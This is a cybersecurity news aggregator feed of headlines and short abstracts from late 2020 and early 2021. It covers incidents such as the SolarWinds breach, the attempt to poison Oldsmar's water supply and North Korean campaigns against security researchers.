Researchers from CrowdStrike connected the dots between Shifu, Wyatt, and Pixi to the DEFRAY777 ransomware attacks and found that all these activities were connected to a single group.Cyware Alerts - Hacker News
February 10, 2021
Hacker Admits Stealing College Girls’ Nude Snaps Full Text
Abstract
New Yorker stole intimate images from social media accounts and traded them. Infosecurity Magazine
February 10, 2021
Hackers auction alleged stolen Cyberpunk 2077, Witcher source code Full Text
Abstract
Threat actors are auctioning the alleged source code for CD Projekt Red games, including Witcher 3, Thronebreaker, and Cyberpunk 2077, that they state were stolen in a ransomware attack.BleepingComputer
February 10, 2021
Hackers are Silently Making an Onslaught on Energy Sector Full Text
Abstract
Researchers revealed that there is a perpetual threat in the utility sector about the next vulnerability to be exploited by cybercriminals. Several prominent incidents manifest the claim.Cyware Alerts - Hacker News
February 9, 2021
High Demand for Hacker Services on Dark Web Forums Full Text
Abstract
Seven in 10 inquiries on dark web forums relate to gaining access to a web resource. Infosecurity Magazine
February 9, 2021
Hacker Tries to Poison Water Supply of Florida Town Full Text
Abstract
A threat actor remotely accessed the IT system of the water treatment facility of Oldsmar and raised the levels of sodium hydroxide in the water, an action that was quickly noticed and remediated.Threatpost
February 9, 2021
Hacker Broke Into Florida County Water Treatment Plant and Attempted to Poison Water Supply Full Text
Abstract
The hacker took control of the computer system's mouse and attempted to change the sodium hydroxide in the water supply from about 100 parts per million to more than 11,100 parts per million.CBS News
February 9, 2021
Cyber-Attacker Tries to Remotely Poison Florida City Full Text
Abstract
Unknown assailant hijacked system to increase sodium hydroxide levels. Infosecurity Magazine
February 8, 2021
Security gaps in operational tech exposed with hacker attempt to poison Florida city water Full Text
Abstract
Experts warn: no one should presume this is a fluke. In fact, the barrier of entry for unsophisticated actors to attack industrial controls is lower than ever.SCMagazine
February 8, 2021
Hackers attempted to poison the water supply of a US city Full Text
Abstract
Pinellas Sheriff revealed that attackers tried to raise levels of sodium hydroxide, by a factor of more than 100, in Oldsmar's water supply. The scenario described by Pinellas Sheriff Bob Gualtieri is disconcerting: an attacker attempted to raise... Security Affairs
February 08, 2021
Hackers tried poisoning town after breaching its water facility Full Text
Abstract
A hacker gained access to the water treatment system for the city of Oldsmar, Florida, and attempted to increase the concentration of sodium hydroxide (NaOH), also known as lye and caustic soda, to extremely dangerous levels.BleepingComputer
February 08, 2021
Hackers breach, attempt to poison Florida city’s water supply Full Text
Abstract
Officials said Monday that a hacker had breached and attempted to poison the water supply for the city of Oldsmar, Fla., last week, but had been unsuccessful.The Hill
February 8, 2021
Big jump in RDP attacks as hackers target staff working from home Full Text
Abstract
There's been a huge increase in cyber criminals attempting to perform attacks by exploiting remote login credentials over the last year, as many employees continue to work from home.ZDNet
February 7, 2021
Hackers Abusing Google Chrome Extension to Exfiltrating Data & Using That Channel for C&C Communication Full Text
Abstract
Recently, an IT cybersecurity researcher, Bojan Zdrnja, has published its research exposing that the threat actors are using Google Chrome's Sync feature...Cyber Security News
February 7, 2021
How the United States Lost to Hackers Full Text
Abstract
The USA is getting hacked from so many sides that it has become virtually impossible to keep track, let alone inform the average American reader who is trying to grasp a largely invisible threat that lives in code.New York Times
February 6, 2021
Hackers post detailed patient medical records from two hospitals to the dark web Full Text
Abstract
Hackers have published extensive patient information from two U.S. hospital chains in an apparent attempt to extort them for money. The files also include at least tens of thousands of scanned diagnostic results and letters to insurers.NBC News
February 04, 2021
Hackers steal StormShield firewall source code in data breach Full Text
Abstract
Leading French cybersecurity company StormShield disclosed that their systems were hacked, allowing a threat actor to access the company's support ticket system and steal source code for Stormshield Network Security firewall software.BleepingComputer
February 04, 2021
Hacking group also used an IE zero-day against security researchers Full Text
Abstract
An Internet Explorer zero-day vulnerability has been discovered used in recent North Korean attacks against security and vulnerability researchers.BleepingComputer
February 4, 2021
Hackers accessed Stormshield data, including source code of ANSSI certified products Full Text
Abstract
The provider of network security products Stormshield discloses data breach, threat actors stole information on some of its clients. Stormshield is a major provider of network security products to the French government, some approved to be used on sensitive...Security Affairs
February 03, 2021
Hackers had access to SolarWinds email system for months: report Full Text
Abstract
Hackers involved in the recent breach of IT group SolarWinds, one of the largest cyber incidents in U.S. history, likely had access to the company’s email system for almost a year.The Hill
February 3, 2021
Hackers stole personnel records of software developer Wind River Full Text
Abstract
The global leader of embedded system software Wind River Systems discloses a data breach that resulted in the theft of customers' personal information. Wind River Systems, a global leader in delivering software for smart connected systems, discloses...Security Affairs
February 3, 2021
Suspected Chinese Hackers Exploited SolarWinds Bug to Spy on U.S. National Finance Center Full Text
Abstract
Suspected Chinese hackers exploited a flaw in software made by SolarWinds Corp to help break into U.S. government computers last year, five people familiar with the matter told Reuters.Reuters
February 01, 2021
Hackers Exploiting Critical Zero-Day Bug in SonicWall SMA 100 Devices Full Text
Abstract
SonicWall on Monday warned of active exploitation attempts against a zero-day vulnerability in its Secure Mobile Access (SMA) 100 series devices. The flaw, which affects both physical and virtual SMA 100 10.x devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v), came to light after the NCC Group on Sunday alerted it had detected "indiscriminate use of an exploit in the wild." Details of the exploit have not been disclosed to prevent the zero-day from being exploited further, but a patch is expected to be available by the end of day on February 2, 2021. "A few thousand devices are impacted," SonicWall said in a statement, adding, "SMA 100 firmware prior to 10.x is unaffected by this zero-day vulnerability." On January 22, The Hacker News exclusively revealed that SonicWall had been breached as a consequence of a coordinated attack on its internal systems by exploiting "probable zero-day vulnerabilities" in its SMA 100 series remote a... The Hacker News
February 1, 2021
Data on 3.2 million DriveSure clients exposed on hacking forum Full Text
Abstract
Hackers published data on 3.2 million users lifted from DriveSure on the Raidforums hacking forum late last month. To prove the data's quality, threat actor "pompompurin" detailed the leaked files and user information in a lengthy post, according to researchers at Risk Based Security, who were the first to report the breach. The… SCMagazine
January 31, 2021
ZINC: Another Actor Targeting Security Researchers Full Text
Abstract
After the Google TAG report about attacks on security researchers, Microsoft has disclosed a similar attempt by another North Korean actor to steal vulnerabilities from the experts.Cyware Alerts - Hacker News
January 31, 2021
New Pro-Ocean crypto-miner targets Apache ActiveMQ, Oracle WebLogic, and Redis installs Full Text
Abstract
The Rocke group is using a new piece of cryptojacking malware dubbed Pro-Ocean to target Apache ActiveMQ, Oracle WebLogic, and Redis installs. The cybercrime group Rocke is using a new piece of cryptojacking malware called Pro-Ocean to target vulnerable...Security Affairs
January 30, 2021
North Korean Hackers Building Fake Persona on Social Networks Full Text
Abstract
North Korea-backed threat actors are impersonating security experts to launch attacks on the security community possibly to obtain details of undisclosed vulnerabilities that can be exploited later.Cyware Alerts - Hacker News
January 29, 2021
Hezbollah Hacker Group Targeted Telecoms, Hosting, ISPs Worldwide Full Text
Abstract
A "persistent attacker group" with alleged ties to Hezbollah has retooled its malware arsenal with a new version of a remote access Trojan (RAT) to break into companies worldwide and extract valuable information. In a new report published by the ClearSky research team on Thursday, the Israeli cybersecurity firm said it identified at least 250 public-facing web servers since early 2020 that have been hacked by the threat actor to gather intelligence and steal the company's databases. The orchestrated intrusions hit a slew of companies located in the U.S., the U.K., Egypt, Jordan, Lebanon, Saudi Arabia, Israel, and the Palestinian Authority, with a majority of the victims representing telecom operators (Etisalat, Mobily, Vodafone Egypt), internet service providers (SaudiNet, TE Data), and hosting and infrastructure service providers (Secured Servers LLC, iomart). First documented in 2015, Volatile Cedar (or Lebanese Cedar) has been known to penetrate a large number... The Hacker News
January 28, 2021
Microsoft: DPRK hackers ‘likely’ hit researchers with Chrome exploit Full Text
Abstract
Today, Microsoft disclosed that they have also been monitoring the targeted attacks against vulnerability researchers for months and have attributed the attacks to a DPRK group named 'Zinc.'BleepingComputer
January 28, 2021
North Korean Hackers Exploiting Psychological Weaknesses Full Text
Abstract
Although the tactic was unique considering the targeting of security researchers, it is not technically novel. This incident is a reminder to maintain your psychological defenses and stay vigilant.Cyware Alerts - Hacker News
January 28, 2021
Stack Overflow 2019 hack was guided by advice from none other than Stack Overflow Full Text
Abstract
Stack Overflow has published details of a breach from May 2019, finding evidence that an intruder in its systems made extensive use of Stack Overflow itself to determine how to make the next move.The Register
January 27, 2021
Pwn2Own 2021: Hackers Offered $200,000 for Zoom, Microsoft Teams Exploits Full Text
Abstract
Trend Micro’s Zero Day Initiative (ZDI) on Tuesday announced the targets, prizes and rules for the Pwn2Own Vancouver 2021 hacking competition, a hybrid event scheduled to take place on April 6-8.Security Week
January 27, 2021
Google: Hackers backed by North Korea tried to steal cyber research Full Text
Abstract
Google's threat analysis team earlier this week said that it had identified a hacking effort suspected to be centered in North Korea that targeted U.S.-based cybersecurity experts.The Hill
January 26, 2021
North Korea Targets Security Researchers in Elaborate 0-Day Campaign Full Text
Abstract
Hackers masquerade as security researchers to befriend analysts and eventually infect fully patched systems at multiple firms with a malicious backdoor.Threatpost
January 26, 2021
Hacker Admits Targeting Major US Websites Full Text
Abstract
Hacker pleads guilty to extorting American website operators with stolen user data. Infosecurity Magazine
January 26, 2021
Mimecast links security breach to SolarWinds hackers Full Text
Abstract
Email security company Mimecast has confirmed today that the threat actor behind the SolarWinds supply-chain attack is behind the security breach it disclosed earlier this month.BleepingComputer
January 26, 2021
North Korea-linked campaign targets security experts via social media Full Text
Abstract
Google TAG is warning that North Korea-linked hackers are targeting security researchers through social media. Google Threat Analysis Group (TAG) is warning that North Korea-linked hackers are targeting security researchers through social media. According... Security Affairs
January 26, 2021
Google’s Threat Analysis Group Spotted North Korean Hackers Targeting Vulnerability Researchers Full Text
Abstract
Google said that a North Korean government hacking group has targeted members of the cyber-security community engaging in vulnerability research. The attacks have been spotted by the Google Threat Analysis Group (TAG).ZDNet
January 25, 2021
North Korean hackers are targeting security researchers with malware, 0-days Full Text
Abstract
A North Korean government-backed hacking group targets security researchers who focus on vulnerability and exploit development via social networks, disclosed Google tonight.BleepingComputer
January 25, 2021
N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches Full Text
Abstract
Google on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development. The internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust. The goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice. "Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers," said TAG researcher A... The Hacker News
January 25, 2021
Hackers Dump Personal Details, Location Info of 2.28 Million Users of MeetMindful Dating Site Full Text
Abstract
The leaked data includes real names, emails, location details, body details, dating preferences, marital status, hashed passwords, Facebook user IDs, Facebook authentication tokens, and IP addresses.ZDNet
January 24, 2021
Hacker leaks data of 2.28M users of dating site MeetMindful Full Text
Abstract
A well-known threat actor has leaked data belonging to 2.28 million users registered on the dating website MeetMindful. ZDNet first reported that the well-known threat actor ShinyHunters has leaked the data of more than 2.28 million users registered...Security Affairs
January 24, 2021
Chinese Hacker Group Abusing Cloud Services to Steal Passenger Data From the Airline Industry Full Text
Abstract
According to the recent threat report of the cybersecurity researchers at Fox-IT, there is a hacking group from China that has been...Cyber Security News
January 23, 2021
MrbMiner cryptojacking campaign linked to Iranian software firm Full Text
Abstract
Sophos experts believe that an Iranian company is behind a recently uncovered MrbMiner crypto-jacking campaign targeting SQL servers. Sophos researchers that investigated the recently uncovered crypto-mining campaign targeting SQL servers with MrbMiner...Security Affairs
January 22, 2021
Intel: Hackers stole unpublished earnings info from corporate site Full Text
Abstract
Intel disclosed on Thursday that unknown threat actors stole an infographic containing info on the company's fourth-quarter and full-year 2020 financial results.BleepingComputer
January 22, 2021
Winnti Continues to Pursue Game Developers and Publishers Using FunnySwitch Backdoor Full Text
Abstract
Cybersecurity experts divulged the details about a cyberattack campaign by the Chinese hacker group, Winnti, that has been targeting organizations in Russia and Hong Kong.Cyware Alerts - Hacker News
January 21, 2021
Hackers hijacked cloud accounts of high-tech and aviation firms, hid in systems for years Full Text
Abstract
The effectiveness of this operation serves as a reminder of the risks of openly sharing and storing plain-text network credentials or sensitive network access instructions on internet-accessible apps or servers.SCMagazine
January 21, 2021
Magecart Groups Rest Underneath Bulletproof Services Full Text
Abstract
According to RiskIQ, several Magecart groups have been hiding phishing domains and malicious tools on a bulletproof hosting service known as Media Land since 2018.Cyware Alerts - Hacker News
January 21, 2021
Hacker blunder leaves stolen passwords exposed via Google search Full Text
Abstract
Hackers hitting thousands of organizations worldwide in a massive phishing campaign forgot to protect their loot and let Google index the stolen passwords for public searches.BleepingComputer
January 21, 2021
Here’s How SolarWinds Hackers Stayed Undetected for Long Enough Full Text
Abstract
Microsoft on Wednesday shared more specifics about the tactics, techniques, and procedures (TTPs) adopted by the attackers behind the SolarWinds hack to stay under the radar and avoid detection, as cybersecurity companies work towards getting a "clearer picture" of one of the most sophisticated attacks in recent history. Calling the threat actor "skillful and methodic operators who follow operations security (OpSec) best practices," the company said the attackers went out of their way to ensure that the initial backdoor (Sunburst aka Solorigate) and the post-compromise implants (Teardrop and Raindrop) are separated as much as possible so as to hinder efforts to spot their malicious activity. "The attackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining elusive while maintaining persistence," researchers from Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center (MSTIC)... The Hacker News
January 21, 2021
Hackers Accidentally Expose Passwords Stolen From Businesses On the Internet Full Text
Abstract
A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to over a thousand corporate employees. The cyber offensive is said to have originated in August last year, with the attacks aimed specifically at energy and construction companies, said researchers from Check Point Research today in a joint analysis in partnership with industrial cybersecurity firm Otorio. Although phishing campaigns engineered for credential theft are among the most prevalent reasons for data breaches, what makes this operation stand out is an operational security failure that led to the attackers unintentionally exposing the credentials they had stolen to the public Internet. "With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses: a gift to every opportunistic attacker," the researchers said. The attack chain comm... The Hacker News
January 20, 2021
Microsoft shares how SolarWinds hackers evaded detection Full Text
Abstract
Microsoft today shared details on how the SolarWinds hackers were able to remain undetected by hiding their malicious activity inside the networks of breached companies.BleepingComputer
January 20, 2021
Chimera Group Now Targeting Cloud Services Full Text
Abstract
Security researchers are reporting a threat group taking advantage of Microsoft and Google cloud services to pilfer data from a broad range of target organizations.Cyware Alerts - Hacker News
January 20, 2021
Malwarebytes: SolarWinds Hackers Read Our Emails Full Text
Abstract
Security vendor is the latest victim to come forward. Infosecurity Magazine
January 20, 2021
Chinese Hacking Group Chimera Launched Attacks Against Airline Industry to Steal Passenger Details Full Text
Abstract
A suspected Chinese hacking group has been attacking the airline industry for the past few years with the goal of obtaining passenger data in order to track the movement of persons of interest.ZDNet
January 19, 2021
SolarWinds Hackers Also Breached Malwarebytes Cybersecurity Firm Full Text
Abstract
Malwarebytes on Tuesday said it was breached by the same group that broke into SolarWinds to access some of its internal emails, making it the fourth major cybersecurity vendor to be targeted after FireEye, Microsoft, and CrowdStrike. The company said its intrusion was not the result of a SolarWinds compromise, but rather due to a separate initial access vector that works by "abusing applications with privileged access to Microsoft Office 365 and Azure environments." The discovery was made after Microsoft notified Malwarebytes of suspicious activity from a dormant email protection app within its Office 365 tenant on December 15, following which it performed a detailed investigation into the incident. "While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor," the company's CEO Marcin Kleczynski said in a post. "We found no evidence of unauthorized access or compromise in any of o... The Hacker News
January 19, 2021
Malwarebytes' email systems hacked by SolarWinds attackers Full Text
Abstract
Cyber security firm Malwarebytes announced that the threat actor behind the SolarWinds attack also breached its network last year. Malwarebytes revealed today that SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes... Security Affairs
January 19, 2021
Malwarebytes says SolarWinds hackers accessed its internal emails Full Text
Abstract
Cybersecurity firm Malwarebytes today confirmed that the threat actor behind the SolarWinds supply-chain attack was able to gain access to some company emails.BleepingComputer
January 19, 2021
SolarWinds hackers used 7-Zip code to hide Raindrop Cobalt Strike loader Full Text
Abstract
The ongoing analysis of the SolarWinds supply-chain attack uncovered a fourth malicious tool that researchers call Raindrop and was used for distribution across computers on the victim network.BleepingComputer
January 19, 2021
MAZE Exfiltration Tactic Widely Adopted Full Text
Abstract
Ransomware gang's blackmail tactic taken up by 17 other cyber-criminal groups. Infosecurity Magazine
January 19, 2021
Telegram-Based Classiscam Operation Targeting Users of European Marketplaces Full Text
Abstract
A new Russian cybercrime outfit dubbed Classiscam has been found to have enabled theft of millions of dollars through a new scam-as-a-service operation.Cyware Alerts - Hacker News
January 17, 2021
EMA said that hackers manipulated stolen documents before leaking them Full Text
Abstract
The European Medicines Agency (EMA) revealed Friday that COVID-19 vaccine documents stolen from its servers have been manipulated before the leak. The European Medicines Agency (EMA) declared that COVID-19 vaccine documents stolen from its servers...Security Affairs
January 17, 2021
A security researcher commandeered a country’s expired top-level domain to save it from hackers Full Text
Abstract
In October, a little-known but critically important domain name for one country’s internet space began to expire. If it fell into the wrong hands, an attacker could redirect millions of unknowing internet users to rogue websites of their choosing.TechCrunch
January 15, 2021
Hackers leaked altered Pfizer data to sabotage trust in vaccines Full Text
Abstract
The European Medicines Agency (EMA) today revealed that some of the stolen Pfizer/BioNTech vaccine candidate data was doctored by threat actors before being leaked online with the end goal of undermining the public's trust in COVID-19 vaccines.BleepingComputer
January 14, 2021
Convicted Hacker Allegedly Commits Fraud While Awaiting Release Full Text
Abstract
ISIS cyber-operative granted compassionate release charged with committing crimes while in federal prison. Infosecurity Magazine
January 13, 2021
Google: Attacker ‘likely’ had access to Android zero-day vulnerabilities Full Text
Abstract
Google’s Project Zero this week introduced a six-part series that offers an analysis of four zero-day vulnerabilities on Windows and Chrome, and known-day Android exploits it found during the team’s extensive research last year.SCMagazine
January 13, 2021
Attackers targeted Accellion FTA in New Zealand Central Bank attack Full Text
Abstract
The root cause for the hack of the New Zealand Central Bank was the Accellion FTA (File Transfer Application) file sharing service. During the weekend, the New Zealand central bank announced that a cyber attack hit its infrastructure. According to the Government...Security Affairs
January 13, 2021
CISA: Hackers bypassed MFA to access cloud service accounts Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) said today that threat actors bypassed multi-factor authentication (MFA) protocols to compromise cloud service accounts.BleepingComputer
January 13, 2021
Hackers Leak Stolen Pfizer-BioNTech COVID-19 Vaccine Data Full Text
Abstract
On the heels of a cyberattack on the EMA, cybercriminals have now leaked Pfizer and BioNTech COVID-19 vaccine data on the internet.Threatpost
January 12, 2021
SolarWinds attackers suspected in Microsoft authentication compromise Full Text
Abstract
Mimecast issued a new certificate and is urging affected customers to delete the old one after Microsoft warned of a compromise.SCMagazine
January 9, 2021
Hackers are Silently Piercing Through Retail Organizations Full Text
Abstract
The boom in online shopping has made the retail sector vulnerable to cyberattacks. A trend has been observed in how attackers are targeting users and pilfering card data.Cyware Alerts - Hacker News
January 9, 2021
Thallium Hacker Targeted Users of Private Stock Investment Messenger Full Text
Abstract
Researchers reported a supply chain attack campaign by a North Korean APT group aimed at the users of a private stock investment service.Cyware Alerts - Hacker News
January 9, 2021
SolarWinds hackers also used common hacker techniques, CISA revealed
Abstract
CISA revealed that the threat actors behind the SolarWinds hack also used password guessing and password spraying in their attacks. The Cybersecurity and Infrastructure Security Agency (CISA) revealed that the threat actors behind the SolarWinds supply chain attack... (Security Affairs)
January 9, 2021
CISA: SolarWinds hackers also used password guessing to breach targets
Abstract
CISA said that the threat actor behind the SolarWinds hack also used password guessing and password spraying attacks to breach targets as part of its recent hacking campaign and didn't always rely on trojanized updates as its initial access vector. (ZDNet)
January 08, 2021
ALERT: North Korean hackers targeting South Korea with RokRat Trojan
Abstract
A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government. Attributing the attack to APT37 (aka ScarCruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT). "The file contains an embedded macro that uses a VBA self-decoding technique to decode itself within the memory spaces of Microsoft Office without writing to the disk. It then embeds a variant of the RokRat into Notepad," the researchers noted in a Wednesday analysis. Believed to be active at least since 2012, the Reaper APT is known for its focus on public and private entities primarily in South Korea, such as chemicals, electronics, manufacturing, aerospace, automotive, and healthcare entities. Since then, their victimization has expanded beyond the Korean peninsula to include... (The Hacker News)
January 8, 2021
‘Earth Wendigo’ Hackers Exfiltrate Emails Through JavaScript Backdoor
Abstract
A newly identified malware attack campaign has been exfiltrating emails from targeted organizations using a JavaScript backdoor injected into a webmail system widely used in Taiwan. (Security Week)
January 07, 2021
Hacker sells Aurora Cannabis files stolen in Christmas cyberattack
Abstract
A hacker is selling the data stolen from cannabis giant Aurora Cannabis after breaching their systems on Christmas day. (BleepingComputer)
January 7, 2021
ShinyHunters Leaks 10 Million Records Allegedly Stolen From ClickIndia, ChqBook, and WedMeGood
Abstract
After hacking masked credit and debit card data of crores of Juspay users, the same hacker, possibly known as 'ShinyHunters', is now selling databases belonging to three more Indian companies. (The Times Of India)
January 6, 2021
SolarWinds hackers had access to roughly 3% of US DOJ O365 mailboxes
Abstract
The US DoJ revealed that the threat actors behind the SolarWinds attack gained access to roughly 3% of the department's O365 mailboxes. The US Department of Justice (DoJ) published a press release to confirm that the threat actors behind the SolarWinds... (Security Affairs)
January 06, 2021
SolarWinds hackers had access to over 3,000 US DOJ email accounts
Abstract
The US Department of Justice said that the attackers behind the SolarWinds supply chain attacks gained access to roughly 3% of the department's Office 365 email inboxes. (BleepingComputer)
January 6, 2021
FBI Warns Hackers are Using Hijacked Home Security Devices
Abstract
The U.S. Federal Bureau of Investigation has recently reported that threat actors are hacking home security systems and applying them to... (Cyber Security News)
January 06, 2021
Hackers start exploiting the new backdoor in Zyxel devices
Abstract
Threat actors are actively scanning the Internet for devices with SSH exposed and trying to log in to them using a recently patched Zyxel hardcoded credential backdoor. (BleepingComputer)
January 05, 2021
Hacker posts data of 10,000 American Express accounts for free
Abstract
A threat actor has posted data of 10,000 American Express credit card holders on a hacker forum for free. In the same forum post, the actor is also claiming to sell more data of Mexican banking customers of American Express, Santander, and Banamex. (BleepingComputer)
January 4, 2021
Microsoft: SolarWinds Attackers Viewed Our Source Code
Abstract
Redmond says the incident did not elevate cyber-risk. (Infosecurity Magazine)
January 1, 2021
Microsoft says hackers viewed its source code
Abstract
The disclosure highlights the broad reach of the attackers, whom investigators have described as extremely sophisticated and well-resourced. And it suggests that corporate espionage may have been as much a motive as a hunt for government secrets. (CNN Money)
December 31, 2020
Microsoft Says SolarWinds Hackers Accessed Some of Its Source Code
Abstract
Microsoft on Thursday revealed that the threat actors behind the SolarWinds supply chain attack were able to gain access to a small number of internal accounts and escalate access inside its internal network. The "very sophisticated nation-state actor" used the unauthorized access to view, but not modify, the source code present in its repositories, the company said. "We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker disclosed in an update. "The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated." The development is the latest in the far-reaching espionage saga that came to light earlier in December following revelations by cybersecurity firm FireEye that attac... (The Hacker News)
December 31, 2020
Microsoft: SolarWinds hackers accessed our source code
Abstract
The threat actors behind the SolarWinds attack were able to breach internal Microsoft accounts to view the source code for Microsoft products. (BleepingComputer)
December 31, 2020
Microsoft says hackers viewed source code as part of SolarWinds attack
Abstract
Microsoft on Thursday reported that its source code had been viewed, but not altered, by hackers involved in the massive cyber espionage incident that affected thousands of companies and much of the federal government. (The Hill)
December 31, 2020
SolarWinds hackers gained access to Microsoft source code
Abstract
The threat actors behind the SolarWinds supply chain attack could have had access to the source code of several Microsoft products. The threat actors behind the SolarWinds attack could have compromised a small number of internal accounts and used... (Security Affairs)
December 30, 2020
FBI Warns Hackers are Using Hijacked Home Security Devices for ‘Swatting’
Abstract
Stolen email credentials are being used to hijack home surveillance devices, such as Ring, to call police with a fake emergency, then watch the chaos unfold. (Threatpost)
December 30, 2020
Hackers Target Usenet Indexing Service NZBGeek and Rob Users’ Personal Data
Abstract
Hackers installed a keylogger and copied the NZBGeek database, exposing the personal details of all users. While the site was operating smoothly, as it normally does, it suddenly became unreachable. (Hackread)
December 29, 2020
SolarWinds hackers aimed at access to victims’ cloud assets
Abstract
Microsoft says that the SolarWinds hackers aimed at compromising the victims' cloud infrastructure after deploying the Solorigate backdoor (aka Sunburst). The Microsoft 365 Defender Team revealed that the goal of the threat actors behind the SolarWinds... (Security Affairs)
December 29, 2020
Microsoft: SolarWinds hackers’ goal was the victims’ cloud data
Abstract
Microsoft says that the end goal of the SolarWinds supply chain compromise was to pivot to the victims' cloud assets after deploying the Sunburst/Solorigate backdoor on their local networks. (BleepingComputer)
December 29, 2020
6 Questions Attackers Ask Before Choosing an Asset to Exploit
Abstract
David “moose” Wolpoff at Randori explains how hackers pick their targets, and how understanding “hacker logic” can help prioritize defenses. (Threatpost)
December 28, 2020
Finnish Parliament attackers hack lawmakers’ email accounts
Abstract
The email accounts of multiple members of parliament (MPs) were compromised following a cyberattack, as revealed today by the Parliament of Finland. (BleepingComputer)
December 28, 2020
Hackers Claim to Sell 65,000 Records Stolen From Japanese Video Game and Anime Company Koei Tecmo
Abstract
Koei Tecmo is a Japanese video game and anime company. The hacker claimed to have hacked into the koeitecmoeurope.com website through a spear-phishing campaign on December 18th. (Secure Reading)
December 27, 2020
HackerOne announces first bug hunter to earn more than $2M in bug bounties
Abstract
White-hat hacking can be a profitable profession: Cosmin Iordache earned more than $2M reporting flaws through the bug bounty program HackerOne. Iordache is the first bug bounty hunter to earn more than $2,000,000 in bounty awards through the vulnerability... (Security Affairs)
December 26, 2020
REvil gang threatens to release intimate pictures of celebs who are customers of The Hospital Group
Abstract
The REvil ransomware gang, aka Sodinokibi, hacked The Hospital Group and threatens to release before-and-after pictures of celebrity clients. The Hospital Group has 11 clinics and has a celebrity clientele, but it made the headlines because the REvil... (Security Affairs)
December 25, 2020
Cyberattacks on Media Agencies Increasing
Abstract
Researchers say attackers are using different attack vectors to target media agencies in Western Europe, Southeast Asia, and North America. Recently, the Al-Jazeera group fell victim to such an attack. (Cyware Alerts - Hacker News)
December 25, 2020
Magecart Mistakenly Spilled the Beans on its Recent Attack
Abstract
A web skimming group inadvertently leaked a list of dozens of online stores it hacked while attempting to deploy a stealthy RAT on compromised e-commerce sites. (Cyware Alerts - Hacker News)
December 25, 2020
Microsoft Warns CrowdStrike of Hackers Targeting Azure Cloud Customers
Abstract
New evidence amidst the ongoing probe into the espionage campaign targeting SolarWinds has uncovered an unsuccessful attempt to compromise cybersecurity firm CrowdStrike and access the company's email. The hacking endeavor was reported to the company by Microsoft's Threat Intelligence Center on December 15, which identified a third-party reseller's Microsoft Azure account to be making "abnormal calls" to Microsoft cloud APIs during a 17-hour period several months ago. The undisclosed affected reseller's Azure account handles Microsoft Office licensing for its Azure customers, including CrowdStrike. Although there was an attempt by unidentified threat actors to read email, it was ultimately foiled as the firm does not use Microsoft's Office 365 email service, CrowdStrike said. The incident comes in the wake of the supply chain attack of SolarWinds revealed earlier this month, resulting in the deployment of a covert backdoor (aka "Sunburst"... (The Hacker News)
December 24, 2020
Hacker Earns $2m in Bug Bounties
Abstract
Romanian man earns $2m through HackerOne and becomes the richest bug bounty hunter in the world. (Infosecurity Magazine)
December 24, 2020
Hacker earns $2 million in bug bounties on HackerOne
Abstract
Cosmin Iordache is the first bug bounty hunter to earn more than $2,000,000 in bounty awards through the vulnerability coordination and bug bounty program HackerOne. (BleepingComputer)
December 24, 2020
Hackers also ‘impacting’ state, local governments, US cybersecurity agency says
Abstract
The top U.S. cybersecurity agency said that an extensive campaign that gave hackers access to networks at several federal agencies is also "impacting" state and local governments. (The Hill)
December 23, 2020
Lazarus Group Hits COVID-19 Vaccine-Maker in Espionage Attack
Abstract
The nation-state actor is looking to speed up vaccine development efforts in North Korea. (Threatpost)
December 23, 2020
Lazarus Attacks Vaccine Research
Abstract
APT group Lazarus attacks two targets related to COVID-19 vaccine research. (Infosecurity Magazine)
December 23, 2020
Cellebrite claims to be able to access Signal messages
Abstract
Israeli cyber security firm Cellebrite claims that it can decrypt messages from the popular Signal messaging app. Israeli security firm Cellebrite has claimed that it can decrypt messages from the highly secure Signal messaging app. The BBC reported... (Security Affairs)
December 23, 2020
Lazarus covets COVID-19-related intelligence
Abstract
While tracking the Lazarus group’s campaigns targeting various industries, Kaspersky found that they recently went after COVID-19-related entities, including a pharma firm and a government ministry. (Kaspersky Labs)
December 22, 2020
Threat Actors Increasingly Using VBA Purging in Attacks
Abstract
Initially detailed in February 2020, VBA purging involves shipping only the VBA source code inside Office documents, without the compiled code that is typically present, and improves detection evasion. (Security Week)
December 22, 2020
Patrick Wardle on Hackers Leveraging ‘Powerful’ iOS Bugs in High-Level Attacks
Abstract
Noted Apple security expert Patrick Wardle discusses how cybercriminals are stepping up their game in targeting Apple users with new techniques and cyberattacks. (Threatpost)
December 22, 2020
A Second Hacker Group May Have Also Breached SolarWinds, Microsoft Says
Abstract
As the probe into the SolarWinds supply chain attack continues, new digital forensic evidence has brought to light that a separate threat actor may have been abusing the IT infrastructure provider's Orion software to drop a similar persistent backdoor on target systems. "The investigation of the whole SolarWinds compromise led to the discovery of an additional malware that also affects the SolarWinds Orion product but has been determined to be likely unrelated to this compromise and used by a different threat actor," the Microsoft 365 research team said on Friday in a post detailing the Sunburst malware. What makes the newly revealed malware, dubbed "Supernova," different is that unlike the Sunburst DLL, Supernova ("app_web_logoimagehandler.ashx.b6031896.dll") is not signed with a legitimate SolarWinds digital certificate, signaling that the compromise may be unrelated to the previously disclosed supply chain attack. In a standalone write-up,... (The Hacker News)
December 21, 2020
A second hacking group has targeted SolarWinds systems
